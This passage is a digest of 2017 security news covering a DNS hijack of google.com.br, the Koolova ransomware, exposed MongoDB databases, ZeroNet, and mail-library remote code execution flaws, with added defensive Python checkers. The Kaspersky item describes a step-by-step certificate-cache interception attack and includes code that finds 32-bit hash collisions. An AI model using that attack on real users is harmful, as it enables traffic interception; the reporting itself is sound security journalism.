This isn’t the first time CyberZeist has hacked the website of the Federal Bureau of Investigation: in 2011, when he was one of the members of the Anonymous collective, he broke into the database of the law enforcement agency.

Let’s close with a curiosity … CyberZeist is asking you to choose the next target.


The hacker is very popular; among his victims are Barclays, Tesco Bank and MI5.

To remain in touch with CyberZeist, visit his page on Pastebin.


11GB archive of Top Secret US SOCOM data accidentally leaked
5.1.2017 securityaffairs Incident

The popular security expert Chris Vickery discovered an 11GB archive of Top Secret US SOCOM data that was accidentally leaked.
A subcontractor of the Pentagon has exposed top-secret information on the US Military Special Operations Command (SOCOM) medics.
Exposed records include names, locations, Social Security Numbers, and salaries of military SOCOM personnel; the database also included the names and locations of at least two Special Forces analysts, who hold Top Secret government clearance.

The precious archive was accessible on the web and its data was stored without encryption: an 11-gigabyte gift to nosy people.

The database was discovered by the popular researcher Chris Vickery, the same expert who has discovered several open MongoDB instances exposed on the Internet.

“A recent data breach discovery of mine contained the names, locations, Social Security Numbers, salaries, and assigned units for scores of psychologists, and other healthcare professionals, deployed within the US Military’s Special Operations Command (SOCOM). Not a single username or password was guarding this intel, which weighed in at over 11 gigs.” reads a blog post published by Vickery.

Vickery discovered the archive and reported it to Potomac Healthcare Solutions, the company that provides healthcare workers to the US Government through Booz Allen Hamilton.
The archive also includes pay scales and residency of psychologists and employees at SOCOM.

Experts at Potomac Healthcare Solutions promptly fixed the issue, even if they initially did not seem to take the claim seriously.

“It is not presently known why an unprotected remote synchronization (rsync) service was active at an IP address tied to Potomac,” added Vickery.

“It shouldn’t take over an hour to contact your IT guy and kill an rsync daemon.”

The exposed data, in the wrong hands, could allow attackers to conduct a wide range of malicious activities, from kidnapping to scams.

“It’s not hard to imagine a Hollywood plotline in which a situation like this results in someone being kidnapped or blackmailed for information,” he says.

“Let’s hope that I was the only outsider to come across this gem.”

In December 2015 the security expert Chris Vickery discovered 191 million records belonging to US voters online; in April 2016 he also discovered a 132 GB MongoDB database open online containing 93.4 million Mexican voter records. In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

Did someone hack the Brazilian google.com.br?
5.1.2017 securityaffairs Hacking

Many users speculated about a possible compromise of the address www.google.com.br. Did someone hack it? Let’s see what happened.
Two days ago, we followed many news items and comments regarding the compromise of the address www.google.com.br. At the beginning, many (me included) discredited the news; however, big online portals quickly started to propagate the event. People close to me also reported accessing the invalid content and asked me for help.

G1 Portal (http://g1.globo.com/tecnologia/noticia/google-nega-ter-sido-alvo-de-hackers-no-brasil-entenda.ghtml) brought some up-to-date information about the fact, including the official answer by Google:

“Some internet users in Brazil faced problems accessing google.com.br due to compromised DNS servers: that is, the malicious change of the routing configuration of those DNS servers, taking the user to a different website than the desired one”, Google informs in its note to G1.

“Google is not responsible for the affected DNS servers, and notified the administrators, who fixed the problem in 30 minutes. The affected users may also switch their network DNS server, as the Google system was not affected”, Google assures.

This report is split into two parts. In the first part, we analyze the technique used in the incident by digging up public information from DNS server caches which retained the swapped “google.com.br” domain content while it was compromised. In the second part, based on the technical analysis, we draw our deductions and conclusions about the case and provide a few preventive security recommendations.

Situation Analysis
For this analysis, we used an environment whose users were still seeing the incorrect content while accessing www.google.com.br. The technical details of the procedures performed follow.

1.1. Address Resolution www.google.com.br

While resolving “www.google.com.br”, we obtained the invalid IP address shown in Picture 1 as a response.

Picture 1 – Invalid address returned by www.google.com.br

Using “whois”, we saw that the IP address does not belong to Google but to a Bulgarian entity, as can be seen in Picture 2.

Picture 2 – Entity responsible for the IP address

The same query for the address “www.google.com.br” from an environment which shows the legitimate Google page returns the legitimate IP address (Picture 3).

Picture 3 – Result is the legitimate Google IP address

As seen in the analysis, it was possible to validate that the invalid content was not hosted on an address belonging to Google; that is, the content of the Google website was not altered. It remains to explain why users were being taken to the wrong address. We continue our analysis.

1.2. DNS Cache Analysis

We now begin our search for a DNS server whose cache is pointing to the invalid IP address for “www.google.com.br”; the goal is to find out which DNS server is returning the invalid IP. After finding one such server, we fetch its cache with the PowerShell command Show-DnsServerCache.

Below are the cache entries for the “*google.com.br” addresses:

Table 1 – Cache from a DNS server during the incident with the domain google.com.br

Notice that the SOA (Start of Authority) entry, the record that identifies the DNS server responsible for the “google.com.br” zone, points to the address “ns1-leader.vivawebhost.com”. That address resolves to an IP whose responsible entity is the same as that of the IP returned for www.google.com.br.

Just to be sure, we did a DNS query for the address www.google.com.br against the DNS server ns1-leader.vivawebhost.com. The first attempt returned a timeout error, likely because the server was being overwhelmed by the number of requests. On our second try, the address was resolved to exactly the same IP users were being directed to, as seen in Picture 4.

Picture 4 – Result of the query for the address www.google.com.br on the DNS server used for the attack

To confirm the cache information, we also queried the SOA record at the address ns1-leader.vivawebhost.com.

Picture 5 – Result for the SOA query with google.com.br at the DNS server used during the attack

The same query against a legitimate Google environment should return the following:

Picture 6 – Result for the legitimate domain

We then queried the domain “google.com.br” at registro.br, the entity responsible for “.br” domains. The result shows that, at the moment this report was being written, the DNS servers responsible for the domain are ns1.google.com, ns2.google.com, ns3.google.com and ns4.google.com. As expected, there are no records pointing to the invalid address ns1-leader.vivawebhost.com.

Picture 7 – Querying the domain “google.com.br” at Jan. 03, 2017 after the incident was resolved

An identified point of attention is the date of the last domain update at registro.br: Jan. 03, 2017, the day of the incident.

2. Conclusion

These analysis results lead us to believe the attacker managed, in some way, to access the “google.com.br” domain configuration at registro.br and change it to point to ns1-leader.vivawebhost.com and ns2-leader.vivawebhost.com. This type of attack is known as “domain kidnapping” (domain hijacking).

While the DNS server values were altered, users trying to access www.google.com.br were taken to the incorrect address. In response to the identified incident, the administrators responsible for the “google.com.br” domain at registro.br quickly reverted the configuration to the original values.

As the attackers used a TTL (time to live) value of 86400 seconds (24 hours), DNS servers which refreshed their Google records during that time window will keep handing out the invalid information for a long period. To speed things up, in case this problem is affecting your organization, I suggest you clear your DNS server cache. An easy way to do this is by restarting your DNS service.
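The delegation check and the TTL arithmetic above, as an added example that is not part of the original report: a small Python script that compares cached NS/SOA records with the nameserver set the registrar publishes and computes how long a resolver that cached the hijacked answer will keep serving it. The records are constructed from the names and TTL reported in the article; the IP address is an RFC 5737 documentation placeholder and the SOA contact field is made up.

```python
"""Check a resolver's cached delegation for google.com.br against the registrar's data.

Added example, not part of the original analysis. Records are constructed from
what the article reports (SOA/NS names, TTL 86400); the A address is a
documentation placeholder, not the real hijacker address.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Record:
    """One resource record as a resolver cache would hold it."""
    name: str    # owner name, e.g. "google.com.br."
    rtype: str   # "NS", "SOA" or "A"
    value: str   # NS target, SOA "mname rname", or A address
    ttl: int     # seconds left before the resolver must re-query


# Nameserver set registro.br publishes for google.com.br (as reported after the fix).
EXPECTED_NS = {"ns1.google.com.", "ns2.google.com.", "ns3.google.com.", "ns4.google.com."}

# Constructed: what a poisoned resolver cache looked like during the incident.
HIJACKED_CACHE = [
    Record("google.com.br.", "SOA", "ns1-leader.vivawebhost.com. hostmaster.example.", 86400),
    Record("google.com.br.", "NS", "ns1-leader.vivawebhost.com.", 86400),
    Record("google.com.br.", "NS", "ns2-leader.vivawebhost.com.", 86400),
    Record("www.google.com.br.", "A", "192.0.2.10", 86400),  # placeholder address
]

# Constructed: a healthy cache for comparison (TTLs are illustrative).
HEALTHY_CACHE = [
    Record("google.com.br.", "SOA", "ns1.google.com. dns-admin.google.com.", 60),
    Record("google.com.br.", "NS", "ns1.google.com.", 345600),
    Record("google.com.br.", "NS", "ns2.google.com.", 345600),
]


def _canon(name: str) -> str:
    return name.lower().rstrip(".")


def delegation_findings(records, expected_ns, zone="google.com.br"):
    """List NS/SOA records of `zone` that point outside the registrar-published set.

    An empty list means the cached delegation is consistent with the registrar."""
    expected = {_canon(n) for n in expected_ns}
    findings = []
    for r in records:
        if _canon(r.name) != _canon(zone):
            continue  # child names such as www carry no delegation data
        if r.rtype == "NS" and _canon(r.value) not in expected:
            findings.append(f"NS {_canon(r.value)} is not in the registrar-published set")
        elif r.rtype == "SOA":
            mname = _canon(r.value.split()[0])
            if mname not in expected:
                findings.append(f"SOA primary {mname} is not a registrar-published nameserver")
    return findings


def stale_until(records, cached_at: int) -> int:
    """Epoch second until which a resolver that cached `records` at `cached_at` may still serve them."""
    return cached_at + max((r.ttl for r in records), default=0)


def hours_remaining(records, cached_at: int, now: int) -> float:
    """How many more hours the poisoned answers can survive in that resolver's cache."""
    return max(0.0, (stale_until(records, cached_at) - now) / 3600)


if __name__ == "__main__":
    for label, cache in (("hijacked", HIJACKED_CACHE), ("healthy", HEALTHY_CACHE)):
        print(label, delegation_findings(cache, EXPECTED_NS) or "OK")
    # A resolver that cached the poisoned answer right before the fix keeps it for up to 24h.
    print("hours of residual poisoning:", hours_remaining(HIJACKED_CACHE, cached_at=0, now=6 * 3600))
```

The findings for the hijacked cache name both rogue NS entries and the rogue SOA primary, which is exactly what the cache dump in Table 1 showed; with the 86400-second TTL a resolver that cached the poisoned answer six hours before the fix still has eighteen hours of bad data left unless its cache is cleared.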

The problem could have been worse. An attack of this kind has great damage potential for the organization which owns the Internet domain as well as for the users that access the address. We list a few examples below (none of which happened this time, though):

The address to which users are redirected could infect them with malicious code. This is usually done by advertising a fake software update.
The attacker could have redirected the e-mails for the kidnapped domain to a server under their control and accessed the content.
By simulating an SMTP/IMAP/IMAPS server, the attackers could have stolen domain user credentials during the authentication attempt.
If you delegate the task of administering your Internet domains to a third-party organization, we recommend you make sure that they follow good access management security practices with domain registry entities, such as having a second authentication factor enabled.

For more information regarding domain kidnapping, see the article I wrote at the end of last year, describing a case study, through this link.

Koolova Ransomware decrypts files if victims read 2 posts about Ransomware
5.1.2017 securityaffairs

The Koolova ransomware will decrypt the encrypted files for free if the victim reads two blog posts about how to avoid ransomware infection.
Ransomware authors are very creative; in the last year we have witnessed a rapid evolution of the cyber extortion practice. Ransomware has become one of the fastest growing threats, and new malware implements sophisticated features to avoid detection.

Recently security experts from MalwareHunterTeam spotted a singular strain of ransomware dubbed Popcorn Time that implemented an interesting mechanism to improve its efficiency. This ransomware comes with a singular feature: it allows victims to either pay up or opt to infect two others using a referral link. If the two other potential victims pay the ransom, the original target receives a free key to unlock their encrypted files.

Now a new strain of ransomware dubbed Koolova has appeared in the wild with a very singular feature. The Koolova ransomware will decrypt the encrypted files for free if the victim reads two articles about how to avoid ransomware infection.
Once the Koolova ransomware has infected a machine, it encrypts the files and then displays a warning screen where the text instructs the victim to open and read two awareness posts before they can get the ransomware decryption key.
Koolova then starts a countdown; if it gets to zero, the ransomware will permanently delete the files.

The two blog posts that the Koolova ransomware wants victims to read are:

“Stay safe while browsing” from Google Security Blog.
“Jigsaw Ransomware Decrypted: Will delete your files until you pay the Ransom” from BleepingComputer.
The threat was spotted by the security researcher Michael Gillespie; the malicious code appears to be a work in progress.

Michael Gillespie @demonslay335
#Koolova #Ransomware based on #HiddenTear decrypts your files if you read @BleepinComputer & @Google articles on #Jigsaw and online security
00:29 - 19 Dec 2016
“Koolova will encrypt a victim’s files and then display a screen similar to the Jigsaw Ransomware where the text is slowly shown on the screen. This text will tell the victim that they must read two articles before they can get a decryption key. It then tells you that if you are too lazy to read two articles before the countdown gets to zero, like Jigsaw, it will delete the encrypted files. This is not an idle threat, as it actually does delete the files.” reported BleepingComputer.com.

Once the victim has read both articles, he can rescue the encrypted files by clicking on the Decrypt My Files button (the malware shows the string “Decripta i Miei File”, which is Italian). The button “Decripta i Miei File” becomes available; when the user clicks on it, the Koolova ransomware will contact the C&C server to get the decryption key.

Clearly, the author of this malware hasn’t developed it for profit but just to spread awareness.

Kaspersky fixing a serious problem with inspection digital certificates

4.1.2017 securityaffairs Vulnerability

Google hacker Tavis Ormandy discovered a serious flaw that affects the Kaspersky antivirus software and the way it manages inspection digital certificates.
Experts from Kaspersky are solving a problem that disabled certificate validation for 400 million users. The problem was spotted by the notorious Google hacker Tavis Ormandy; the vulnerability affects the Kaspersky antivirus software and the way it uses certificates to analyze encrypted traffic.

The security software installs its own trusted CA, the Kaspersky Anti-Virus Personal Root, and uses its digital certificate for traffic inspection; in this way it is able to decrypt the traffic and scan it for malicious patterns.

“In order to inspect encrypted data streams using SSL/TLS, Kaspersky installs a WFP driver to intercept all outgoing HTTPS connections. They effectively proxy SSL connections, inserting their own certificate as a trusted authority in the system store and then replace all leaf certificates on-the-fly. This is why if you examine a certificate when using Kaspersky Antivirus, the issuer appears to be “Kaspersky Anti-Virus Personal Root”.” Ormandy wrote in a security advisory.

The process implemented by Kaspersky for certificate interception has previously resulted in serious vulnerabilities. Now the expert discovered other issues, such as the way leaf certificates are cached, which relies on an extremely naive fingerprinting technique.

“Kaspersky caches recently generated certificates in memory in case the user agent initiates another connection. In order to do this, Kaspersky fetches the certificate chain and then checks if it’s already generated a matching leaf certificate in the cache. If it has, it just grabs the existing certificate and private key and then reuses it for the new connection.” explained the expert.

“The cache is a binary tree, and as new leaf certificates and keys are generated, they’re inserted using the first 32 bits of MD5(serialNumber||issuer) as the key. If a match is found for a key, they just pull the previously generated certificate and key out of the binary tree and start using it to relay data to the user-agent.”

It is easy to understand that a 32-bit key is open to brute-force attacks that generate a collision in a few seconds. An attacker can produce a collision with other certificates.

Ormandy also provided a description of the attack:

Mallory wants to intercept mail.google.com traffic, for which the 32bit key is 0xdeadbeef.
Mallory sends you the real leaf certificate for mail.google.com, which Kaspersky validates and then generates its own certificate and key for.
On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let’s say attacker.com)
Now Mallory redirects DNS for mail.google.com to attacker.com, Kaspersky starts using their cached certificate and the attacker has complete control of mail.google.com.
Ormandy also provided a proof of the bug, forcing a collision between Hacker News and the manchesterct.gov website.

“You can reproduce this bug, by visiting https://autodiscover.manchesterct.gov, then https://news.ycombinator.com and observing that the content is signed by the wrong certificate.” he added. “So if you use Kaspersky Antivirus in Manchester, Connecticut and were wondering why Hacker News didn’t work sometimes, it’s because of a critical vulnerability that has effectively disabled SSL certificate validation for all 400 million Kaspersky users.”

The expert also provided the C source code that can be used to generate a colliding certificate for testing.
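The cache-key weakness Ormandy describes, as an added example written for this page (it is neither his proof-of-concept nor Kaspersky's code): the 32-bit key from the advisory, the first 32 bits of MD5(serialNumber||issuer), is modelled beside a cache keyed on the full SHA-256 fingerprint, and a birthday search shows how quickly two different serials collide under the weak scheme. The issuer string, the hostnames and the toy certificate layout are invented for the demonstration.

```python
"""Why a 32-bit truncated hash is unsafe as a certificate-cache key.

Added example, not Ormandy's proof-of-concept and not Kaspersky's code. It
models the cache keyed on the first 32 bits of MD5(serialNumber || issuer), as
the advisory describes, next to a cache keyed on the full SHA-256 of the
certificate. Certificates here are toy dicts; issuer and names are made up.
"""
import hashlib
import struct


def weak_cache_key(serial: bytes, issuer: bytes) -> int:
    """Key scheme from the advisory: first 32 bits of MD5(serialNumber || issuer)."""
    return struct.unpack(">I", hashlib.md5(serial + issuer).digest()[:4])[0]


def strong_cache_key(cert_der: bytes) -> bytes:
    """Full SHA-256 fingerprint of the whole certificate (256-bit key space)."""
    return hashlib.sha256(cert_der).digest()


def make_cert(serial: bytes, issuer: bytes, cn: str) -> dict:
    """Toy stand-in for a parsed certificate; 'der' is just the fields concatenated."""
    return {"serial": serial, "issuer": issuer, "cn": cn,
            "der": serial + b"|" + issuer + b"|" + cn.encode()}


class LeafCache:
    """Model of an interception proxy's cache of generated leaf certificates.

    Whether two different upstream certificates get the same generated leaf
    depends entirely on the key function handed in."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.store = {}

    def leaf_for(self, cert: dict) -> str:
        key = self.key_fn(cert)
        if key not in self.store:
            # A real proxy would mint a new leaf certificate and private key here.
            self.store[key] = f"leaf-for-{cert['cn']}"
        return self.store[key]


def find_colliding_serials(issuer: bytes, max_tries: int = 4_000_000):
    """Birthday search: two distinct serials with the same 32-bit key under `issuer`.

    With a 32-bit key a collision is expected after roughly 2**16 candidates, so
    this finishes in a fraction of a second. Returns (serial_a, serial_b, key)."""
    seen = {}
    for i in range(max_tries):
        # Deterministic pseudo-random 20-byte serial so runs are reproducible.
        serial = hashlib.sha256(i.to_bytes(4, "big")).digest()[:20]
        key = weak_cache_key(serial, issuer)
        if key in seen and seen[key] != serial:
            return seen[key], serial, key
        seen[key] = serial
    raise RuntimeError("no collision within max_tries")


def demo(issuer: bytes = b"CN=Example Intermediate CA"):
    """Show the weak cache conflating two certificates while the strong cache keeps them apart."""
    serial_a, serial_b, _ = find_colliding_serials(issuer)
    real = make_cert(serial_a, issuer, "mail.example.com")
    other = make_cert(serial_b, issuer, "other.example.net")
    weak = LeafCache(lambda c: weak_cache_key(c["serial"], c["issuer"]))
    strong = LeafCache(lambda c: strong_cache_key(c["der"]))
    return {
        "weak": (weak.leaf_for(real), weak.leaf_for(other)),
        "strong": (strong.leaf_for(real), strong.leaf_for(other)),
    }


if __name__ == "__main__":
    print(demo())
```

The weak cache hands the leaf it generated for mail.example.com to a connection whose upstream certificate belongs to a different name, which is the confusion the advisory exploits; the SHA-256 keyed cache never does. A 32-bit key space has a birthday bound of about 2^16 entries, so the search completes almost instantly even in pure Python, whereas a 256-bit fingerprint puts a collision out of reach. In real traffic the colliding certificate also has to be one that chains to a trusted CA for the attacker's own name, which is why a full fingerprint of the entire certificate, not a truncated hash of two fields, is the right cache key.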

Someone Hijacking Unsecured MongoDB Databases for Ransom
4.1.2017 thehackernews Hacking
Nearly two years back, we warned users about publicly accessible MongoDB instances – almost 600 Terabytes (TB) of data – on the Internet which require no authentication, potentially leaving websites and servers at risk of hacking.
These MongoDB instances weren't exposed due to any flaw in the software, but due to a misconfiguration (bad security practice) that let any remote attacker access MongoDB databases without using any special hacking tool.
MongoDB later resolved the issue in the next version of its software by no longer allowing unrestricted remote access by default in the configuration, but thousands of site administrators have not updated their servers yet.
But trust me, they'll now regret this!

A hacker is now hijacking and wiping out unsecured MongoDB databases, but keeping a copy of those databases in order to ask administrators for a ransom of 0.2 Bitcoins (nearly US$211) to return the lost data. So, admins without backups are left in a bind.
In fact, the rising price of Bitcoin adds to the trouble. At the time of writing, 1 Bitcoin = USD 1063.93.
Security researcher and co-founder of the GDI Foundation Victor Gevers (@0xDUDE) discovered the attacks and notified the owners of exposed non-password-protected MongoDB installations via Twitter.
Gevers identified nearly 200 MongoDB installations that had been erased and held for ransom, while this number reached approximately 2,000 databases as of 4:00 p.m., as reported by John Matherly, the founder of Shodan, where many exposed MongoDB databases can be found.
These attacks have been going on for over a week, targeting servers all over the world. It is believed that instead of encrypting the data, the attacker, who goes by the name "harak1r1," ran a script that replaced the content of the database with the attacker's ransom note.
While accessing one of the open servers, Gevers found that in place of the database content there is only one table, named "WARNING," which reads:
16 Victims Already Paid the Ransom
It appears that around 16 organizations so far have paid the ransom to the attacker.

Matherly has been warning of the dangers of exposed MongoDB installations since 2015: they allow an attacker to remotely access the databases over the Internet without the need for any form of authentication.
Matherly said the majority of the 30,000 publicly exposed MongoDB instances run on cloud servers such as Amazon, Digital Ocean, Linode, and the Internet service and hosting provider OVH, and do so without authentication, making cloud services more error-prone than datacenter hosting.
How to Know if You've Been Hacked?
Check the MongoDB accounts to see whether anyone has added a secret (admin) user.
Check GridFS to see whether someone has stored any files there.
Check the log files to see who has accessed MongoDB.
How to Protect Yourself?
Enable authentication, which provides you 'defense in depth' if your network is compromised. Edit your MongoDB configuration file: auth = true.
Use firewalls: disable remote access to MongoDB, if possible. Admins are advised to use firewalls to protect MongoDB installations by blocking access to port 27017.
Configure bind_ip: limit access to the server by binding to local IP addresses.
Upgrade: administrators are strongly recommended to upgrade their software to the latest release.
MongoDB is the most popular open-source NoSQL database, used by companies of all sizes, from eBay and Sourceforge to The New York Times and LinkedIn. Administrators are encouraged to follow the security checklist provided by the company.
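The protection checklist above, turned into an added example (not MongoDB's own tooling): a script that parses a mongod configuration and reports which of the configuration-level recommendations (authentication, bind address, default-port exposure) are not met. It understands the legacy key = value format the checklist quotes (auth = true, bind_ip) and a two-level subset of the YAML format (security.authorization, net.bindIp). Both sample configurations are constructed for the demonstration.

```python
"""Audit a mongod configuration for the settings in the checklist above.

Added example, not MongoDB's own tooling. Supports the legacy 'key = value'
format (auth, bind_ip, port) and a two-level subset of the YAML format
(security.authorization, net.bindIp, net.port). Sample configs are constructed.
"""

WEAK_CONF = """\
# constructed legacy-format example: nothing restricts who can connect
dbpath = /var/lib/mongodb
logpath = /var/log/mongodb/mongod.log
port = 27017
"""

HARDENED_CONF = """\
# constructed YAML-format example with the recommended settings applied
storage:
  dbPath: /var/lib/mongodb
net:
  bindIp: 127.0.0.1
  port: 27017
security:
  authorization: enabled
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_mongod_conf(text: str) -> dict:
    """Flatten a config into dotted keys, e.g. {'net.bindIp': '127.0.0.1'} or {'auth': 'true'}."""
    settings, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()            # strip comments
        if not line.strip():
            continue
        if "=" in line and ":" not in line:              # legacy "key = value"
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip()
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        value = value.strip()
        if indent == 0 and not value:                     # "net:" opens a section
            section = key
        elif indent == 0:
            settings[key] = value
            section = None
        else:
            settings[f"{section}.{key}" if section else key] = value
    return settings


def audit(settings: dict) -> list:
    """Return the checklist items that are NOT satisfied; an empty list means the config passes."""
    findings = []
    auth = settings.get("auth", settings.get("security.authorization", "")).lower()
    if auth not in ("true", "enabled"):
        findings.append("authentication disabled: set 'auth = true' or 'security.authorization: enabled'")
    bind = settings.get("bind_ip", settings.get("net.bindIp", ""))
    addrs = {a.strip() for a in bind.split(",") if a.strip()}
    if not addrs:
        findings.append("no bind address set: versions before 3.6 then listen on all interfaces; set bind_ip / net.bindIp")
    elif "0.0.0.0" in addrs or "::" in addrs:
        findings.append("bind address includes a wildcard: the instance is reachable from every network")
    port = settings.get("port", settings.get("net.port", "27017"))
    if port == "27017" and addrs - LOOPBACK:
        findings.append("default port 27017 on a non-loopback address: make sure the firewall blocks it externally")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(parse_mongod_conf(conf)) or ["OK"])
```

Run against the weak configuration the script reports both the missing authentication and the missing bind address; the hardened one passes cleanly. Note the third check only fires when the instance is bound to a non-loopback address on the default port, since that is the combination Shodan-style scans find.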

ZeroNet could be a solution against censorship and much more
4.1.2017 securityaffairs Safety

ZeroNet is a new and revolutionary decentralized P2P internet that promises to avoid censorship and improve user privacy on the open web.
ZeroNet is a decentralized and open source web platform. It’s based on BitTorrent (P2P) technology and Bitcoin cryptography. These features ensure a decentralized, censorship-resistant network.

The contents published by users can never be deleted because they’re distributed directly to other visitors without any central server. The content remains online as long as at least one user is serving it. It’s impossible to shut down websites on ZeroNet.

“When a site is updated by its owner, all nodes serving that site (previous visitors) will receive only the incremental updates done to the site content.” states the official website of the project.

ZeroNet implements a network whereby users can access and surf websites that are hosted on other users’ machines; it doesn’t include centralized servers.

“It’s nowhere because it’s everywhere!” declares the ZeroNet site.

You can create a free website using ZeroNet. There are no costs for hosting because visitors automatically store (seed) your website. This could be a challenge to web hosting companies. It is always online with no downtime and remains accessible even if your internet connection is unavailable, provided you have visited the website previously.

The site owner can accept payment directly to the site address.

Is ZeroNet anonymous?
If you want to hide your IP address, ZeroNet supports the Tor network. The level of anonymity implemented is the same as that of BitTorrent, but combined use with the Tor network will help protect the user’s anonymity.

ZeroNet is made to work with anonymity networks: you can easily hide your IP using the Tor network.

Furthermore, you don’t need to remember your password, because your account is protected by the same cryptography as a Bitcoin wallet.


In order to ensure file integrity, when you visit a site you first download a file named “content.json”: it contains the names of all the other files, their hashes, and a cryptographic signature by the site owner. You then download the other files and verify them against the hashes included in “content.json”. This limits the spread of corrupted files or malicious code.


Another feature is multi-user sites, for example for posting on a forum or blog. You send your auth address to the site owner, who creates a new file and sets your auth address as its valid signer. The site owner then publishes a new “content.json” declaring that you are allowed to sign that file.
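The integrity check described above, as an added example in Python that is not part of ZeroNet’s own code: a constructed content.json-style manifest is built from a few sample files, and a visitor-side verifier reports which downloaded files match their listed sha512 hash, which were tampered with, which are missing, and which were never listed. The site owner’s signature over the manifest is assumed to have been verified already and is not shown here.

```python
import hashlib
import json

# Constructed sample site (not a real ZeroNet site): file name -> content.
SITE_FILES = {
    "index.html": b"<html><body>hello zeronet</body></html>",
    "js/app.js": b"console.log('app');",
}


def sha512_hex(data: bytes) -> str:
    """Hex digest of the file body; content.json entries carry this value."""
    return hashlib.sha512(data).hexdigest()


def build_manifest(files: dict) -> dict:
    """Build the 'files' section of a content.json-style manifest, the way a
    site owner would before signing it. Only the fields used below are kept."""
    return {
        "files": {
            name: {"sha512": sha512_hex(data), "size": len(data)}
            for name, data in files.items()
        }
    }


# Serialized manifest a visitor would download first (assumed already
# signature-checked against the site owner's key).
MANIFEST_JSON = json.dumps(build_manifest(SITE_FILES))


def verify_site(manifest_json: str, downloaded: dict) -> dict:
    """Compare downloaded files against the manifest.

    Returns a report with four lists:
      ok        - listed files whose size and sha512 match
      mismatch  - listed files whose size or hash differs (tampered/corrupt)
      missing   - listed files that were not downloaded
      unlisted  - downloaded files the manifest does not vouch for
    """
    manifest = json.loads(manifest_json)
    listed = manifest["files"]
    report = {"ok": [], "mismatch": [], "missing": [], "unlisted": []}
    for name, meta in listed.items():
        data = downloaded.get(name)
        if data is None:
            report["missing"].append(name)
        elif len(data) != meta["size"] or sha512_hex(data) != meta["sha512"]:
            report["mismatch"].append(name)
        else:
            report["ok"].append(name)
    for name in downloaded:
        if name not in listed:
            # A file nobody signed for must not be served or executed.
            report["unlisted"].append(name)
    return report


def is_trusted(report: dict) -> bool:
    """Only serve the site when every file is present, listed and intact."""
    return not (report["mismatch"] or report["missing"] or report["unlisted"])


if __name__ == "__main__":
    tampered = dict(SITE_FILES)
    tampered["js/app.js"] = b"console.log('evil');"  # constructed tampering
    print(verify_site(MANIFEST_JSON, tampered))
```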

Below is the list of features implemented by ZeroNet:

Easy, zero configuration setup.
Password-less BIP32 based authorization: Your account is protected by the same cryptography as your Bitcoin wallet.
Real-time updated sites.
Namecoin .bit domains support.
SQL Database support: Allows for easier site development and faster page load times.
Anonymity: Full Tor network support with .onion hidden services instead of IPv4 addresses.
TLS encrypted connections.
Automatic UPnP port opening.
Plugin for multiuser (openproxy) support.
Works with any browser/OS.
ZeroNet users also have access to:

ZeroBoard: Simple message board demo for dynamic content distribution
ZeroBlog: Self publishing blog demo
ZeroTalk: Decentralized, P2P forum demo
ZeroMail: End-to-end encrypted, distributed, P2P messaging site. To improve privacy it uses a BitMessage-like solution and will not expose the message recipient.
ZeroChat: The finished site for the tutorial of creating a server-less, SQL backed, real-time updated P2P chat application using ZeroNet in less than 100 lines of code
ZeroMe: Decentralized, Twitter-like P2P social network.
One of the questions in the FAQ section captured my attention:

What happens when someone hosts malicious content?

The answer is very clear:

The ZeroNet sites are sandboxed; they have the same privileges as any other website you visit over the Internet. You are in full control of what you are hosting. If you find suspicious content you can stop hosting the site at any time.

Critical Updates — RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail
3.1.2017 thehackernews
A security researcher recently reported a critical vulnerability in one of the most popular open source PHP libraries used to send emails that allowed a remote attacker to execute arbitrary code in the context of the web server and compromise a web application.
Disclosed by Polish security researcher Dawid Golunski of Legal Hackers, the issue (CVE-2016-10033) in PHPMailer used by more than 9 Million users worldwide was thought to be fixed with the release of version 5.2.18.
However, Golunski managed to bypass the patched version of PHPMailer that was given a new CVE (CVE-2016-10045), which once again put millions of websites and popular open source web apps, including WordPress, Drupal, 1CRM, SugarCRM, Yii, and Joomla, at risk of remote code execution attack.
PHPMailer eventually fixed the issue with an update, version 5.2.20. All versions of PHPMailer before this critical release are affected, so web administrators and developers are strongly recommended to update to the new version.
In addition to this bug, Golunski also reported a similar vulnerability in two other PHP mailing libraries, SwiftMailer and ZendMail, that could also have led to a remote code execution attack.
RCE Flaw in SwiftMailer
SwiftMailer is also a popular PHP library used by many major open-source projects, including top PHP frameworks like Yii2, Laravel and Symfony, for sending emails over SMTP.
The vulnerability (CVE-2016-10074) in SwiftMailer can be exploited in the same manner as the PHPMailer vulnerability, by targeting web site components that use the SwiftMailer class, such as contact/registration forms, password reset forms, and so forth.
Attackers can execute arbitrary code remotely in the context of the web server, which could further be exploited to access a web server hosting a web application that used a vulnerable version of the library.
The SwiftMailer vulnerability affects all versions of the library, including the then-current release, version 5.4.5-DEV.
Golunski disclosed the vulnerability to the SwiftMailer team, and the developers acted fast to fix the issue, rolling out patched version 5.4.5 within a day.
"The mail transport (Swift_Transport_MailTransport) was vulnerable to passing arbitrary shell arguments if the "From," "ReturnPath" or "Sender" header came from a non-trusted source, potentially allowing Remote Code Execution," reads the changelog for SwiftMailer on GitHub.
RCE Flaw in ZendMail

ZendMail is a component of a very popular PHP programming framework Zend Framework with more than 95 Million installations.
The critical vulnerability (CVE-2016-10034) in ZendMail can also be exploited in the same manner as one discovered in PHPMailer and SwiftMailer by targeting web site components that use ZendMail, like contact/registration forms, password email reset forms, and so on.
Attackers could achieve remote code execution in the context of the web server and remotely compromise any target web application that used the vulnerable version of ZendMail.
The researcher reported the issue to ZendMail, and the developers fixed the vulnerability and rolled out the patched version.
"When using the zend-mail component to send email via the Zend\Mail\Transport\Sendmail transport, a malicious user may be able to inject arbitrary parameters to the system sendmail program," ZendMail wrote in a blog post.
"The attack is performed by providing additional quote characters within an address; when unsanitized, they can be interpreted as additional command line arguments, leading to the vulnerability."
